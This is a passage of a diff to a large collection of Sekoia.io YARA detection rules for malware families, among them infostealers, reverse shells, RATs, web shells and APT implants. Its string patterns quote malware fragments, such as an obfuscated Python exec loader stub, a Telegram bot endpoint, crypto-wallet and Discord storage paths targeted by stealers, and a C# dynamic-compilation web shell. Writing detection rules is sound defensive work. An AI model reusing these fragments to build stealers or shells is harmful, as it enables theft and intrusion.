+		hash3 = "8e2429d70989bbdd2ea8842dce7c3d790ebe148490ee519b47767557f4a4a733"
+		hash4 = "be86b8559a84d97aa1cc9852e60a553f5164477bacfc69b7f3453ad37fb6fd2a"
+		hash5 = "78065411e7e8eb205ddae7215a229b7c93bdca5d628670f89caa982238ac7eb6"
+		hash6 = "73bf3a5877a7fe16544d15670e3ece034e4826323ba555b3527ad4d061f44ec4"
 
 	strings:
-		$ = "($h.value).PadRight((($h.value).Length+($h.value).Length%4),'='" ascii wide
-		$ = "(($h.value).Length%4 -ne 0)" ascii wide
-		$ = "-match \"@@(.*)@@\"" ascii wide
-		$ = "[Environment]::NewLine+$_.Exception.Message | Out-File -FilePath" ascii wide
-		$ = "ContainsSubjectStrings.Add(\"@@\")" ascii wide
+		$ = "Mini-Junked.dll"
 
 	condition:
-		2 of them and filesize < 50KB
+		uint16( 0 ) == 0x5A4D and all of them or pe.imphash ( ) == "75a9ae7d4394abdc30e2a873908fa09d" or hash.md5 ( pe.rich_signature.clear_data ) == "06b2ec5892ac9ad566693b04cf427f3f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "612006b6f68cd0b8b0d48252dbdef4be" )
 }
-rule SEKOIA_Infostealer_Win_Blackcap : FILE
+rule SEKOIA_Apt_Tealkurma_Snappytcp_Reverse_Shell_Strings : FILE
 {
 	meta:
-		description = "Finds BlackCap Grabber samples (Python code obfuscated using Py-Fuscate)"
+		description = "Detects TealKurma SnappyTCP reverse shell"
 		author = "Sekoia.io"
-		id = "1aa1fadb-3413-46e2-b733-1ad2134f7be2"
-		date = "2023-03-06"
+		id = "e842825c-546c-475a-bc94-7e97aea4e9e0"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_blackcap.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tealkurma_snappytcp_reverse_shell_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "b826c88d557ea0a516534946ad9531eda1a875cb9c4ddf92d9b98f8c7b86623e"
+		logic_hash = "feb24cafcf5b080c91dab42bf8d78fbdb0b7fae9395c7513f02aa90a25663d2c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246554,53 +246455,54 @@ rule SEKOIA_Infostealer_Win_Blackcap : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$imp01 = "import asyncio, json, ntpath, random, re, shutil, sqlite3, subprocess, threading, winreg, zipfile, httpx, psutil, win32gui, win32con, pyperclip, base64, requests, ctypes, time" ascii
-		$imp02 = "from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer;from Crypto.Cipher import AES;from PIL import ImageGrab;from win32crypt import CryptUnprotectData" ascii
-		$pyf01 = "import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(binascii.a2b_base64(b'YwAAAAAA" ascii
+		$ = "2>&1>/dev/null&" ascii
+		$ = ".php HTTP/1.1" ascii
+		$ = "GET /" ascii
+		$ = "Hostname: %s" ascii
+		$ = "bash -c \"./" ascii
 
 	condition:
-		($imp01 in ( 0 .. 500 ) and $pyf01 in ( @imp01 + 200 .. @imp01 + 1000 ) or $imp02 in ( 0 .. 1000 ) and $pyf01 in ( @imp02 + 100 .. @imp02 + 500 ) ) and filesize > 100KB and filesize < 500KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 3MB and 3 of them
 }
-
-rule SEKOIA_Merlin_Linux_Elf : FILE
+rule SEKOIA_Water_Sigbin_Group
 {
 	meta:
-		description = "Detects Merling agent (ELF)"
+		description = "Detects IOCs related to the 8220 Mining group."
 		author = "Sekoia.io"
-		id = "d9c57f5e-26c3-43be-b2cf-10f5129d3be6"
-		date = "2022-01-03"
+		id = "c49728e8-db7e-4d83-97d2-7d56b51f8a52"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_linux_elf.yar#L4-L34"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/water_sigbin_group.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f7edd517a575b54c9ee8acdc7a5ebac7c0c9eb286abc49e2962b02aad40e5973"
-		score = 40
+		logic_hash = "dd51945bf79e37b50d377eda3641eb32438dcb5a1c55fb4a9b66a5b5a8b5ed0d"
+		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "github.com/Ne0nd0g/merlin" ascii
-		$s2 = "github.com/refraction-networking" ascii
-		$s3 = "SendMerlinMessage" ascii
+		$s1 = "Z12A3" ascii fullword
+		$s2 = "FromBase64String" ascii fullword
+		$s3 = "Start-Process" ascii fullword
+		$s4 = "WriteAllBytes" ascii fullword
 
 	condition:
-		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "80199718ff1821a3fe914cd2279ab3a0" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and all of them and filesize < 15MB
+		all of them
 }
-
-rule SEKOIA_Tool_Impersonate_Strings : FILE
+rule SEKOIA_Apt_Granitetyphoon_Sword2023_Strings : FILE
 {
 	meta:
-		description = "Detects Impersonate"
+		description = "Detects Sword2023 malware based on strings"
 		author = "Sekoia.io"
-		id = "2ab345a2-9366-4673-b398-a59ba6954af5"
-		date = "2024-07-24"
+		id = "417b355f-9eb8-40ae-bc3b-f7f23b5ca63e"
+		date = "2023-05-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_impersonate_strings.yar#L3-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_granitetyphoon_sword2023_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "63c46a2d97d0a8360351b8906665186c5ad2dcaa6f2edba6da7bf4de2ce00241"
+		logic_hash = "8644547f093295eeac30c9040796329a3e2222c06a942d14899545726c8bed78"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246608,31 +246510,27 @@ rule SEKOIA_Tool_Impersonate_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[*] Listing available tokens"
-		$ = "[ID: %2d][SESSION: %d][INTEGRITY: %-6ws][%-18ws][%-22ws] User: %ws"
-		$ = "[*] Impersonating %ws"
-		$ = "[!] Impersonation failed error: %d"
-		$ = "[*] Adding user %ls on %ls"
-		$ = "[!] Add user failed with error: %d"
-		$ = "[*] Adding user %ws to domain group %ws"
-		$ = "[!] Add user in domain %ws failed with error: %d"
-		$ = "[!] Couldn't change token session id (error: %d)"
+		$ = "TERM=linux"
+		$ = ";echo"
+		$ = "sh:time out"
+		$ = "sh:read stdout error"
+		$ = "/proc/sys/kernel/random/uuid"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them or pe.imphash ( ) == "e14ce763114276674e22b7b8b637bd4b"
+		( uint32be( 0 ) == 0x7f454c46 ) and filesize < 100KB and all of them
 }
-rule SEKOIA_Tool_Exploit_Badpotato_Strings : FILE
+rule SEKOIA_Apt_Tortoiseshell_Wateringhole_Script : FILE
 {
 	meta:
-		description = "Detects BadPotato compiled exploit"
+		description = "Detect's Tortoiseshell WH script"
 		author = "Sekoia.io"
-		id = "079aabbc-6978-4d71-92d2-d2a7ce1cc915"
-		date = "2022-09-09"
+		id = "58c5ae66-fe09-497c-80bf-20feee4d95e7"
+		date = "2023-05-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_exploit_badpotato_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_tortoiseshell_wateringhole_script.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a45935ea5877a4b81468cbe0e1a4a7232b955771442f84bb3b88b7992ed23937"
+		logic_hash = "8ad886443b1bd17048054b57650d38cda1ffccc10fedfac86283a41daf956dc2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246640,28 +246538,30 @@ rule SEKOIA_Tool_Exploit_Badpotato_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "RpcStringBindingCompose failed with status 0x" wide
-		$ = "RpcBindingFromStringBinding failed with status 0x" wide
-		$ = "RpcBindingSetAuthInfoEx failed with status 0x" wide
-		$ = "RpcBindingSetOption failed with status 0x" wide
-		$ = "\\\\.\\pipe\\{0}\\pipe\\spoolss" wide
-		$ = "[*] {0} Success! ProcessPid:{1}" wide
+		$ = "btoa(pluggin.toString())"
+		$ = "btoa(document.referrer)"
+		$ = "pluggin.push(navigator.plugins[i]"
+		$ = "navigator.language"
+		$ = "window.RTCPeerConnection"
+		$ = "sha256(canvas.toDataURL("
+		$ = "canvas.getContext('2d"
+		$ = "noop = function() {},"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
+		5 of them and filesize < 10000
 }
-rule SEKOIA_Apt_Oilrig_Clipog_Strings : FILE
+rule SEKOIA_Apt_Toneshell_Shellcode : FILE
 {
 	meta:
-		description = "Detects OilRig's Clipog stealer"
+		description = "Detects first bytes of ToneShell used to call the shellcode or the code to check the MagicNumber (0x17 0x03 0x03)"
 		author = "Sekoia.io"
-		id = "0ac40fd9-f67d-41fa-a774-77a3a1b7cac3"
-		date = "2023-10-24"
+		id = "5ac8d2e9-dbeb-42f9-8343-1281510d4411"
+		date = "2024-10-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_clipog_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toneshell_shellcode.yar#L1-L34"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "16f3fef59db9c58025a4a977de944b628e9dc850f87c1bb22e2f2f97601e5107"
+		logic_hash = "0e164677681dce2aa75d3621d9f3df1449c3e67a3551817693856d80ccc48eca"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246669,26 +246569,42 @@ rule SEKOIA_Apt_Oilrig_Clipog_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[ClipBoard=" wide
-		$ = "[NUMPAD .]" wide
-		$ = "[SPACE]" wide
-		$ = "GetClipboardData"
+		$code = {55 8b ec 83 ec 0c e8 85 00 00 00 6a 00 6a 00 6a 02 6a 00 6a 00 68 00 00 00 10}
+		$MagicNumberParser = {
+        B8 01 00 00 00
+        6B C8 00
+        8B 55 ??
+        0F BE 04 0A
+        83 F8 17
+        75 ??
+        B9 01 00 00 00
+        C1 E1 00
+        8B 55 ??
+        0F BE 04 0A
+        83 F8 03
+        75 ??
+        B9 01 00 00 00
+        D1 E1
+        8B 55 ??
+        0F BE 04 0A
+        83 F8 03
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 350KB and all of them
+		any of them and filesize < 1MB
 }
-rule SEKOIA_Hacktool_Win_Processhacker : FILE
+rule SEKOIA_Apt_Mustangpanda_Windows_Remoteshell : FILE
 {
 	meta:
-		description = "Detect ProcessHacker hacktool"
+		description = "Detects Remote Shell of Mustang Panda by detecting internal structure intialization"
 		author = "Sekoia.io"
-		id = "1dffe8c9-2ab7-4265-965e-8673b80f17d5"
-		date = "2022-09-09"
+		id = "cffdd11e-9700-462e-a965-f9f51db63f0b"
+		date = "2022-12-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_win_processhacker.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_windows_remoteshell.yar#L1-L121"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cfcfaa7f3afc8b82ce0188d9ead63746a7effd40acb6ad504f8d70a45d8476d5"
+		logic_hash = "4a72ae1574022d6454e29a6b05a0279f2e774f8218d24a3a866721d958c52e1a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246696,51 +246612,122 @@ rule SEKOIA_Hacktool_Win_Processhacker : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Unable to uninstall KProcessHacker" wide
-		$str1 = "Process Hacker's settings file is corrupt. Do you want to reset it?" wide
-		$str2 = "Process Hacker uses the following components:" wide
+		$chunk_1 = {
+        C7 45 ?? 0C 00 00 00
+        8D 4E ??
+        C6 01 03
+        8B 87 ?? ?? ?? ??
+        89 41 ??
+        66 8B 87 ?? ?? ?? ??
+        66 89 41 ??
+        }
+		$chunk_2 = {
+        C7 45 ?? 0C 00 00 00
+        8D 4E ??
+        C6 01 02
+        8B 87 ?? ?? ?? ??
+        89 41 ??
+        66 8B 87 ?? ?? ?? ??
+        66 89 41 ??
+        8B 45 ??
+        83 E8 05
+        50
+        51
+        E8 ?? ?? ?? ??
+        }
+		$chunk_3 = {
+        C7 87 ?? ?? ?? ?? 01 00 00 00
+        8D 4E ??
+        C7 45 ?? 0C 00 00 00
+        C6 01 04
+        8B 87 ?? ?? ?? ??
+        89 41 ??
+        66 8B 87 ?? ?? ?? ??
+        66 89 41 ??
+        8B 45 ??
+        83 E8 05
+        50
+        51
+        E8 ?? ?? ?? ??
+        }
+		$chunk_4 = {
+        83 65 ?? ??
+        EB ??
+        8B 45 ??
+        40
+        89 45 ??
+        8B 45 ??
+        3B 45 ??
+        7D ??
+        8B 45 ??
+        03 45 ??
+        0F B6 08
+        8B 45 ??
+        33 D2
+        6A ??
+        5E
+        F7 F6
+        0F B6 84 15 ?? ?? ?? ??
+        33 C8
+        8B 45 ??
+        03 45 ??
+        88 08
+        EB ??
+        83 65 ?? ??
+        EB ??
+        8B 45 ??
+        40
+        89 45 ??
+        8B 45 ??
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 8MB and 3 of them
 }
-rule SEKOIA_Loader_Win_Bumblebee : FILE
+
+rule SEKOIA_Rat_Win_Ninerat
 {
 	meta:
-		description = "Detect BUMBLEBEE based on specific strings"
+		description = "Detect the NineRAT payload"
 		author = "Sekoia.io"
-		id = "ff36f512-c700-4f52-bc89-68ab9c69462c"
-		date = "2022-04-08"
+		id = "a9f4f78b-5b86-4ac1-9b9b-ba2672b938bf"
+		date = "2023-12-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_bumblebee.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_ninerat.yar#L4-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "97755e8d593acbc9acc8ce7f1a82a345fc7eea049addbb96577f6abc1b6d5fd6"
+		logic_hash = "bbb695444a6ec0d6049d0ce233ca37de6f78393e5ceb5d454867c8b554269684"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30"
+		hash2 = "82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def"
+
+	strings:
+		$ = "https://api.telegram.org/bot"
+		$ = "/getMe"
+		$ = "/upgrade"
+		$ = "/getFile"
+		$ = "/sendMessage"
+		$ = ">> Request send time:"
 
-	strings:
-		$str0 = "Z:\\hooker2\\Common\\md5.cpp" wide
-		$str1 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
-		$str2 = "bumblebee" ascii
-
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3ce78c89e2c0e795ad3382aa12e99683" )
 }
-rule SEKOIA_Exploit_Linux_Eop_Dirtyc0W_Strings : FILE
+rule SEKOIA_Shell_Win_Danfuan : FILE
 {
 	meta:
-		description = "Detects DirtyCow exploit"
+		description = "Detect the Danfuan malware"
 		author = "Sekoia.io"
-		id = "f0551e56-b08f-4f6f-81df-f30fbb8ee7b8"
-		date = "2023-12-08"
+		id = "d1cf9988-270b-4a22-bdd5-f40b625715a8"
+		date = "2022-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_dirtyc0w_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/shell_win_danfuan.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "70f0dda642e7892e35c1afabb4fa6a9fe62ad82d5aa2d90787e83809bc6f5859"
+		logic_hash = "96929ef478a8773022233a4092b3c157867aae6ee185568a6327d033c05a68f1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246748,54 +246735,57 @@ rule SEKOIA_Exploit_Linux_Eop_Dirtyc0W_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DirtyCow root privilege escalation"
-		$ = "Backing up %s to /tmp/bak"
-		$ = "(o o)_____/"
+		$ = "<%@ WebHandler Language=\"C#\" class=\"DynamicCodeCompiler\"%>"
+		$ = "CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt))"
+		$ = "MethodInfo objMifo = objInstance.GetType().GetMethod("
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		filesize < 15KB and all of them
 }
-rule SEKOIA_Bot_Win_Yamabot : FILE
+rule SEKOIA_Apt_Konni : FILE
 {
 	meta:
-		description = "Detect the Yamabot implant used by Lazarus"
+		description = "Rule based on structure offsets and file extension"
 		author = "Sekoia.io"
-		id = "9f5b85c4-59e3-448f-b054-5b4932ee89bb"
-		date = "2023-08-29"
+		id = "6a20c492-e932-41bd-ac4a-01d35bfb0c49"
+		date = "2022-09-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_win_yamabot.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_konni.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "cb183cbf9703d96b5f463d635885eab66e0d36c4763752a5cb934538ada60ec3"
+		logic_hash = "8f178421fd0968f4ce809054022579c7fc8dede5f6514e89966d13acb83d75d9"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f"
-		hash2 = "66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66"
-		hash3 = "74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643"
-		hash4 = "def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563"
 
 	strings:
-		$s1 = "_/D_/Bot/YamaBot/"
-		$s2 = "Go build ID: \"ujRRNborth3MgXzS7HTu/aYhLszO8_95srnr8Fk1n/Xr8P792kGZ_VUqOQVc97/kgx_H7YuMZBl2Ajyac2M\""
+		$ext_1 = ".zip" wide ascii fullword
+		$ext_2 = ".cab" wide ascii fullword
+		$ext_3 = ".rar" wide ascii fullword
+		$ext_4 = ".ini" wide ascii fullword
+		$ext_5 = ".dat" wide ascii fullword
+		$offset_structure_1 = { 8d ?? 08 02 00 00 }
+		$offset_structure_2 = { 8d ?? 10 04 00 00 }
+		$offset_structure_3 = { 8d ?? 18 06 00 00 }
+		$url = "%s/dn.php?name=%s&prefix=%s" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of them and filesize > 3MB
+		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of ( $ext_* ) and all of ( $offset_structure_* ) and $url
 }
-rule SEKOIA_Infostealer_Win_Whitesnake_Stealer_Feb23 : FILE
+rule SEKOIA_Infostealer_Win_Phoenixwave : FILE
 {
 	meta:
-		description = "Finds WhiteSnake samples (stealer module)"
+		description = "Detect the PhoenixWave infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "68ae7fbc-4486-4b60-af5e-f37ddc58f170"
-		date = "2023-03-01"
+		id = "67c05ea8-2f1b-4c60-b108-e05d7d0c6508"
+		date = "2022-04-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_whitesnake_stealer_feb23.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_phoenixwave.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "90007c38c644b79b2a60d9a252bd95071c5be57c649d73b66a73a1158cddc2fb"
+		logic_hash = "efeffb2f0df4c2f8156c401bac5f44c415c4c3e02e84e8db55dad68488f39fea"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246803,34 +246793,41 @@ rule SEKOIA_Infostealer_Win_Whitesnake_Stealer_Feb23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$fun01 = "Ibhiyptxjhiacrnxomvqjb" ascii
-		$fun02 = "Irwcvmgzsduiiizaabbczm" ascii
-		$whi = "WhiteSnake.Properties.Resources" ascii
-		$str01 = "get_UtcNow" ascii
-		$str02 = "get_IPAddress" ascii
-		$str03 = "get_Ticks" ascii
-		$str04 = "set_commands" ascii
-		$str05 = "set_Information" ascii
-		$str06 = "set_filedata" ascii
-		$str07 = "get_Jpeg" ascii
-		$str08 = "set_Culture" ascii
-		$str09 = "MakeScreenshot" ascii
+		$str0 = "##################################################\n                  Information\n##################################################\n" wide
+		$str1 = "Specify a single character: either D or F" wide
+		$str2 = "// This SFX source file was generated by DotNetZip " wide
+		$str3 = "aHR0cDovL2lwLWFwaS5jb20vanNvbg==" wide
+		$str4 = "TG9jYWxBcHBEYXRh" wide
+		$str5 = "UGhvZW5peFdhdmU=" wide
+		$str6 = "virustotal" wide
+		$str7 = "SELECT * FROM win32_operatingsystem" wide
+		$str8 = "SELECT * FROM Win32_VideoController" wide
+		$app0 = "\\discordcanary\\Local Storage\\leveldb" wide
+		$app1 = "\\discordptb\\Local Storage\\leveldb" wide
+		$app2 = "\\discorddevelopment\\Local Storage\\leveldb" wide
+		$app3 = "\\D877F783D5D3EF8C\\" wide
+		$app4 = "\\IndexedDB\\file__0.indexeddb.leveldb" wide
+		$app5 = "\\Steam\\Games.txt" wide
+		$app6 = "nkbihfbeogaeaoehlefnkodbefgpgknn" wide
+		$app7 = "fhbohimaelbohpjbbldcngcnapndodjp" wide
+		$app8 = "fnjhmkhhmkbjkkabndcnnogagogbneec" wide
+		$app9 = "\\Opera Software\\Opera GX Stable" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $fun* ) or $whi ) and 3 of ( $str* ) or 7 of ( $str* ) ) and filesize < 100KB
+		uint16( 0 ) == 0x5A4D and 7 of ( $str* ) and 8 of ( $app* )
 }
-rule SEKOIA_Apt_Sandworm_Awfulshred_Obfuscation_Apr2022 : FILE
+rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Loader : FILE
 {
 	meta:
-		description = "Detects the AWFULSHRED wiper used by Sandworm"
+		description = "Detects VHD ransomware x64 loader "
 		author = "Sekoia.io"
-		id = "52317e6b-7f2c-4c2a-bcfc-ebb4ab4c728e"
-		date = "2022-04-12"
+		id = "377f3ec5-fa2a-431e-93d2-6a1eb9e01d28"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_awfulshred_obfuscation_apr2022.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_vhd_ransomware_loader.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3e1eed3a4b638893828289f928a75b855bc9e1e29444ffa81c0461fdc1277cad"
+		logic_hash = "33000fd79b5aae59dcbf445bb4d0d65cf5f939f376a4e3d9e23e14b11ca297da"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246838,24 +246835,36 @@ rule SEKOIA_Apt_Sandworm_Awfulshred_Obfuscation_Apr2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$h = "#!/bin/bash"
-		$s = { 64 65 63 6c 61 72 65 20 2d 72 20 [8] 3d }
+		$ = { B8 64 [8] B8 75 [8] B8 6D [8] B8 70 [8] B8 2E [8] B8 62 [8] B8 69 [8] B8 6E }
+		$ = { 48 63 ?? ?? ??
+        48 8B ?? ?? ??
+        0F BE ?? ??
+        B9 ?? ?? ?? ??
+        48 6B ?? ??
+        48 8B ?? ?? ??
+        0F BE ?? ??
+        ?? ??
+        48 63 ?? ?? ??
+        48 8B ?? ?? ??
+        88 ?? ??
+        EB }
+		$ = { 25 00 73 00 5c [3-15] 25 00 64 00 25 00 64 00 2e 00 62 00 69 00 6e }
 
 	condition:
-		$h at 0 and #s > 15
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 2 of them
 }
-rule SEKOIA_Apt_Oilrig_Webshell : FILE
+rule SEKOIA_Win_Malware_Agnianestealer : FILE
 {
 	meta:
-		description = "Detects a webshell used by OilRig"
+		description = "Detect the Agniane stealer using strings"
 		author = "Sekoia.io"
-		id = "53955117-5176-4682-89ad-1503faba42aa"
-		date = "2024-10-23"
+		id = "704c85b7-8b82-4160-ae1b-fd1054cae8e2"
+		date = "2023-08-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_oilrig_webshell.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_malware_agnianestealer.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0e0879bafa1becf7e4aef008229a79ab8e0c50eda03232abd5cbb8fc59f482d3"
+		logic_hash = "0aa40fcb713ab40711108290e8274d783c1336a2c4c03eba2fcc4a44f2ebe39f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -246863,26 +246872,24 @@ rule SEKOIA_Apt_Oilrig_Webshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "string d = com;"
-		$ = "string p = fu;"
